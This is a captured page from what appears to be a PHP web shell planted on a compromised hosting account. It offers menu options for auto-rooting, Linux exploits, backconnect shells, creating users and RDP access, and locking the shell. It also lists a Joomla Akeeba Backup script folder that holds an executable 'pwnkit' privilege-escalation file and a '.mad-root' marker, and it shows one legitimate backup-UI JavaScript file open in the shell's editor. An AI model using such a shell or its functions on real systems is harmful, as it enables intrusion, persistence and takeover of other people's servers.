Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
www /
media /
com_akeeba /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
Ajax.min.js
3.05
KB
-rw----r--
Alice.min.js
3.09
KB
-rw----r--
Backup.min.js
9.83
KB
-rw----r--
Configuration.min.js
31.11
KB
-rw----r--
ConfigurationWizard.min.js
7.33
KB
-rw----r--
ControlPanel.min.js
927
B
-rw----r--
DatabaseFilters.min.js
6.21
KB
-rw----r--
FileFilters.min.js
13.6
KB
-rw----r--
IncludeFolders.min.js
5.9
KB
-rw----r--
Manage.min.js
895
B
-rw----r--
Modal.min.js
4.3
KB
-rw----r--
MultipleDatabases.min.js
7.66
KB
-rw----r--
RegExDatabaseFilters.min.js
4.96
KB
-rw----r--
RegExFileFilter.min.js
5.13
KB
-rw----r--
Restore.min.js
4.5
KB
-rw----r--
Stepper.min.js
2.88
KB
-rw----r--
System.min.js
7.68
KB
-rw----r--
Tooltip.min.js
3.32
KB
-rw----r--
Transfer.min.js
11.35
KB
-rw----r--
UserInterfaceCommon.min.js
6.01
KB
-rw----r--
akeebaui.js
529
B
-rw----r--
akeebauipro.js
6.96
KB
-rw----r--
alice.js
4.45
KB
-rw----r--
backup.js
14.07
KB
-rw----r--
configuration.js
48.18
KB
-rw----r--
confwiz.js
11.23
KB
-rw----r--
dbef.js
13.02
KB
-rw----r--
eff.js
14.92
KB
-rw----r--
encryption.js
19.06
KB
-rw----r--
fsfilter.js
27.09
KB
-rw----r--
gui-helpers.js
21.69
KB
-rw----r--
multidb.js
16.48
KB
-rw----r--
piecon.min.js
2.22
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
regexdbfilter.js
11.22
KB
-rw----r--
regexfsfilter.js
11.08
KB
-rw----r--
restore.js
6.5
KB
-rw----r--
stepper.js
4.1
KB
-rw----r--
system.js
23.35
KB
-rw----r--
transfer.js
24.85
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : akeebauipro.js
/** * Akeeba Backup Pro * The modular PHP5 site backup software solution * This file contains the jQuery-based client-side user interface logic for * the features available only in the Pro version * @package akeebaui * @copyright Copyright (c)2009-2016 Nicholas K. Dionysopoulos * @license GNU GPL version 3 or, at your option, any later version * @version 1.0 **/ /** * Setup (required for Joomla! 3) */ if(typeof(akeeba) == 'undefined') { var akeeba = {}; } if(typeof(akeeba.jQuery) == 'undefined') { akeeba.jQuery = jQuery.noConflict(); } //============================================================================= //Akeeba Backup Pro - Regular expression based files and folders filters //============================================================================= function escapeHTML(rawData) { return rawData.split("&").join("&").split( "<").join("<").split(">").join(">"); } //============================================================================= //Akeeba Backup Pro - Import arbitrary archives from S3 //============================================================================= function ak_s3import_resetroot() { (function($) { $('#ak_s3import_folder').val(''); })(akeeba.jQuery); return true; } function ak_s3import_chdir(prefix) { (function($) { $('#ak_s3import_folder').val(prefix); $('#adminForm').submit(); })(akeeba.jQuery); } //============================================================================= //Akeeba Backup Pro - Box.net integration //============================================================================= function akconfig_box_openoauth() { (function($) { window.open('index.php?option=com_akeeba&view=config&task=dpeoauthopen&engine=box','akeeba_box_window','width=1010,height=500'); })(akeeba.jQuery); } function akconfig_box_gettoken() { (function($) { akeeba.System.params.AjaxURL = 'index.php?option=com_akeeba&view=config&task=dpecustomapi'; var data = new Object(); data['engine'] = 'box'; data['method'] = 'getauth'; akeeba.System.doAjax(data, function(res){ if(res['error'] != '') { alert('ERROR: Could not complete authentication; please retry'); } else { $(document.getElementById('var[engine.postproc.box.token]')).val(res['token']); alert('OK!'); } }); })(akeeba.jQuery); } function akeeba_render_boxfolders(config_key, defdata, label, row_div) { (function($) { var current_id = 'var['+config_key+']'; var editor = $(document.createElement('select')).attr({ id: 'akeeba_box_folders', name: current_id }); var button = $(document.createElement('button')).html(akeeba_translations['UI-REFRESH']); button.bind('click', function(e){ e.preventDefault(); akeeba.System.params.AjaxURL = 'index.php?option=com_akeeba&view=config&task=dpecustomapi'; var data = new Object(); data['engine'] = 'box'; data['method'] = 'gettree'; akeeba.System.doAjax(data, function(res){ $('#akeeba_box_folders').html(''); option = $(document.createElement('option')).attr('value',0).html('- Folder -'); option.appendTo('#akeeba_box_folders'); $.each(res, function(id, name){ option = $(document.createElement('option')).attr('value',id).html(name); if(id == defdata['default']) option.attr('selected','selected'); option.appendTo('#akeeba_box_folders'); }); }); return false; }) editor.appendTo( row_div ); button.appendTo( row_div ); button.click(); })(akeeba.jQuery); } //============================================================================= //Akeeba Backup Pro - DropBox API v1 integration //============================================================================= function akconfig_dropbox_openoauth() { (function($) { window.open('index.php?option=com_akeeba&view=config&task=dpeoauthopen&engine=dropbox','akeeba_dropbox_window','width=1010,height=500'); })(akeeba.jQuery); } function akconfig_dropbox_gettoken() { (function($) { akeeba.System.params.AjaxURL = 'index.php?option=com_akeeba&view=config&task=dpecustomapi'; var data = new Object(); data['engine'] = 'dropbox'; data['method'] = 'getauth'; akeeba.System.doAjax(data, function(res){ if(res['error'] != '') { alert('ERROR: Could not complete authentication; please retry'); } else { $(document.getElementById('var[engine.postproc.dropbox.token]')).val(res.token.oauth_token); $(document.getElementById('var[engine.postproc.dropbox.token_secret]')).val(res.token.oauth_token_secret); $(document.getElementById('var[engine.postproc.dropbox.uid]')).val(res.token.uid); alert('OK!'); } }); })(akeeba.jQuery); } //============================================================================= //Akeeba Backup Pro - DropBox API v2 integration //============================================================================= function akconfig_dropbox2_openoauth() { (function($) { window.open('index.php?option=com_akeeba&view=config&task=dpeoauthopen&engine=dropbox2','akeeba_dropbox2_window','width=1010,height=500'); })(akeeba.jQuery); } function akeeba_dropbox2_oauth_callback(data) { (function($) { // Update the tokens $(document.getElementById('var[engine.postproc.dropbox2.access_token]')).val(data.access_token); // Close the window myWindow = window.open("", "akeeba_dropbox2_window"); myWindow.close(); })(akeeba.jQuery); } //============================================================================= //Akeeba Backup Pro - OneDrive integration //============================================================================= function akconfig_onedrive_openoauth() { (function($) { window.open('index.php?option=com_akeeba&view=config&task=dpeoauthopen&engine=onedrive','akeeba_onedrive_window','width=1010,height=500'); })(akeeba.jQuery); } function akeeba_onedrive_oauth_callback(data) { (function($) { // Update the tokens $(document.getElementById('var[engine.postproc.onedrive.access_token]')).val(data.access_token); $(document.getElementById('var[engine.postproc.onedrive.refresh_token]')).val(data.refresh_token); // Close the window myWindow = window.open("", "akeeba_onedrive_window"); myWindow.close(); })(akeeba.jQuery); } //============================================================================= //Akeeba Backup Pro - Google Drive integration //============================================================================= function akconfig_googledrive_openoauth() { (function($) { window.open('index.php?option=com_akeeba&view=config&task=dpeoauthopen&engine=googledrive','akeeba_googledrive_window','width=1010,height=500'); })(akeeba.jQuery); } function akeeba_googledrive_oauth_callback(data) { (function($) { // Update the tokens $(document.getElementById('var[engine.postproc.googledrive.access_token]')).val(data.access_token); $(document.getElementById('var[engine.postproc.googledrive.refresh_token]')).val(data.refresh_token); // Close the window myWindow = window.open("", "akeeba_googledrive_window"); myWindow.close(); })(akeeba.jQuery); }
Close